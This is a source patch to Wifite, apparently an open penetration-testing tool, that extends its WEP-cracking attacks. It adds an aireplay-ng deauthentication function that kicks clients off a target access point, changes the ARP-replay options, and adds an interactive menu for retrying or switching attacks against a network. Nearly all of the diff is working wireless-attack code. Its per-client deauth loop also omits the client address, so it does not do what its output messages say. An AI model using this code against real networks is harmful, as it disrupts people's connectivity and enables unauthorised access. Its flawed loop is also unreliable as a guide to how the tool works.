From e6c02bd98be6bfe278b150db976bed4d6ddd7272 Mon Sep 17 00:00:00 2001 From: derv82 Date: Mon, 15 May 2017 23:03:54 -0400 Subject: [PATCH] More options when interrupting a WEP attack. Options: Move to a specific attack, deauth & retry current attack, or skip the target. --- Wifite.py | 1 + py/Aireplay.py | 23 +++++++++++++--- py/AttackWEP.py | 72 ++++++++++++++++++++++++++++++++++++++----------- 3 files changed, 77 insertions(+), 19 deletions(-) diff --git a/Wifite.py b/Wifite.py index 1e05c60..606654a 100755 --- a/Wifite.py +++ b/Wifite.py @@ -133,6 +133,7 @@ class Wifite(object): if attack.success: attack.crack_result.save() + Color.pl("{+} Finished attacking {C}%d{W} target(s), exiting" % len(targets)) def print_banner(self): diff --git a/py/Aireplay.py b/py/Aireplay.py index 72def85..a2d7655 100644 --- a/py/Aireplay.py +++ b/py/Aireplay.py @@ -4,7 +4,7 @@ from Configuration import Configuration from Process import Process -import os +import os, time class WEPAttackType(object): ''' Enumeration of different WEP attack types ''' @@ -162,10 +162,9 @@ class Aireplay(object): cmd.extend(['-h', client_mac]) elif attack_type == WEPAttackType.p0841: - cmd.append('--interactive') + cmd.append('--arpreplay') cmd.extend(['-b', target.bssid]) cmd.extend(['-c', 'ff:ff:ff:ff:ff:ff']) - cmd.extend(['-t', '1']) cmd.extend(['-x', str(Configuration.wep_pps)]) cmd.extend(['-F']) # Automatically choose first packet cmd.extend(['-p', '0841']) @@ -228,6 +227,24 @@ class Aireplay(object): Color.pl('output:\n"%s"' % out) return None + @staticmethod + def deauth(target_bssid, client_mac=None, num_deauths=1, timeout=2): + deauth_cmd = [ + 'aireplay-ng', + '-0', # Deauthentication + str(num_deauths), + '--ignore-negative-one', + '-a', target_bssid # Target AP + ] + if client_mac is not None: + # Station-specific deauth + deauth_cmd.extend(['-c', client_mac]) + deauth_cmd.append(Configuration.interface) + proc = Process(deauth_cmd) + while proc.poll() is None: + if proc.running_time() >= timeout: + proc.interrupt() + time.sleep(0.2) if __name__ == '__main__': t = WEPAttackType(4) diff --git a/py/AttackWEP.py b/py/AttackWEP.py index 7ecfa4e..1f40924 100644 --- a/py/AttackWEP.py +++ b/py/AttackWEP.py @@ -33,7 +33,9 @@ class AttackWEP(Attack): aircrack = None # Aircrack process, not started yet - for (attack_index, attack_name) in enumerate(Configuration.wep_attacks): + attacks_remaining = list(Configuration.wep_attacks) + while len(attacks_remaining) > 0: + attack_name = attacks_remaining.pop(0) # BIG try-catch to capture ctrl+c try: # Start Airodump process @@ -189,7 +191,6 @@ class AttackWEP(Attack): Color.pl('\n{!} restarting {C}aireplay{W} after' + ' {C}%d{W} seconds of no new IVs' % stale_seconds) - Color.pl("\naireplay output:\n%s" % aireplay.get_output()) aireplay = Aireplay(self.target, \ wep_attack_type, \ client_mac=client_mac, \ @@ -203,7 +204,10 @@ class AttackWEP(Attack): # End of big while loop # End of with-airodump except KeyboardInterrupt: - if not self.user_wants_to_continue(attack_index): + if len(attacks_remaining) == 0: + self.success = False + return self.success + if self.user_wants_to_stop(attack_name, attacks_remaining, airodump_target): self.success = False return self.success # End of big try-catch @@ -212,21 +216,57 @@ class AttackWEP(Attack): self.success = False return self.success - def user_wants_to_continue(self, attack_index): - ''' Asks user if attacks should continue using remaining methods ''' - Color.pl('\n{!} {O}interrupted{W}\n') + def user_wants_to_stop(self, current_attack, attacks_remaining, target): + ''' + Ask user what attack to perform next (re-orders attacks_remaining, returns False), + or if we should stop attacking this target (returns True). + ''' + target_name = target.essid if target.essid_known else target.bssid - if attack_index + 1 >= len(Configuration.wep_attacks): - # No more WEP attacks to perform. - return False + Color.pl("\n\n{!} {O}Interrupted") + Color.pl("{+} {W}Next steps:") - attacks_remaining = Configuration.wep_attacks[attack_index + 1:] - Color.pl("{+} {G}%d{W} attacks remain ({C}%s{W})" % (len(attacks_remaining), ', '.join(attacks_remaining))) - prompt = Color.s('{+} type {G}c{W} to {G}continue{W} or {R}s{W} to {R}stop{W}: ') - if raw_input(prompt).lower().startswith('s'): - return False - else: - return True + # Deauth clients & retry + attack_index = 1 + Color.pl(" {G}1{W}: {O}Deauth clients{W} and {G}retry{W} {C}%s attack{W} against {G}%s{W}" % (current_attack, target_name)) + + # Move onto a different WEP attack + for attack_name in attacks_remaining: + attack_index += 1 + Color.pl(" {G}%d{W}: Start new {C}%s attack{W} against {G}%s{W}" % (attack_index, attack_name, target_name)) + + # Stop attacking entirely + attack_index += 1 + Color.pl(" {G}%d{W}: {R}Stop attacking, {O}Move onto next target{W}" % attack_index) + while True: + answer = raw_input(Color.s("{?} Select an option ({G}1-%d{W}): " % attack_index)) + if not answer.isdigit() or int(answer) < 1 or int(answer) > attack_index: + Color.pl("{!} {R}Invalid input: {O}Must enter a number between {G}1-%d{W}" % attack_index) + continue + answer = int(answer) + break + + if answer == 1: + # Deauth clients & retry + num_deauths = 1 + Color.p("\r{+} {O}Deauthenticating *broadcast*{W} (all clients)...") + Aireplay.deauth(target.bssid) + for client in target.clients: + Color.clear_entire_line() + Color.p("\r{+} {O}Deauthenticating client {C}%s{W}..." % client.bssid) + Aireplay.deauth(target.bssid) + num_deauths += 1 + Color.clear_entire_line() + Color.pl("\r{+} Sent {C}%d {O}deauths{W}" % num_deauths) + # Re-insert current attack to top of list of attacks remaining + attacks_remaining.insert(0, current_attack) + return False # Don't stop + elif answer == attack_index: + return True # Stop attacking + elif answer > 1: + # User selected specific attack: Re-order attacks based on desired next-step + attacks_remaining.insert(0, attacks_remaining.pop(answer-2)) + return False # Don't stop def fake_auth(self): '''